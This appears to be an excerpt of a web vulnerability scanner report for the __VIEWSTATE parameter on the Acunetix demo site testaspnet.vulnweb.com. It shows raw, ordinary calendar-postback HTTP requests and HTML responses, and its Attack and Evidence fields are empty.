Request Body - size: 1,099 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8414&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAmEfC9doIZGRkMtHRKW048AnH%2BZmVkLYIJZTNjJE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKEu7iDBAL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWrksxiux6VzzWI1lgFrT%2FRRSyWqA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:28 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAmEfC9doIZGRkMtHRKW048AnH+ZmVkLYIJZTNjJE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKEu7iDBAL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWrksxiux6VzzWI1lgFrT/RRSyWqA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:White" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8402&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAo0pU7NoIZGRkTeqE0lLMibSaom2kQjdpIsvA1VQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKile%2BKCgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX7dAWKmAhcYw1wo76usdta8qYGDQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:33 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAo0pU7NoIZGRkTeqE0lLMibSaom2kQjdpIsvA1VQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKile+KCgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX7dAWKmAhcYw1wo76usdta8qYGDQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:White" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
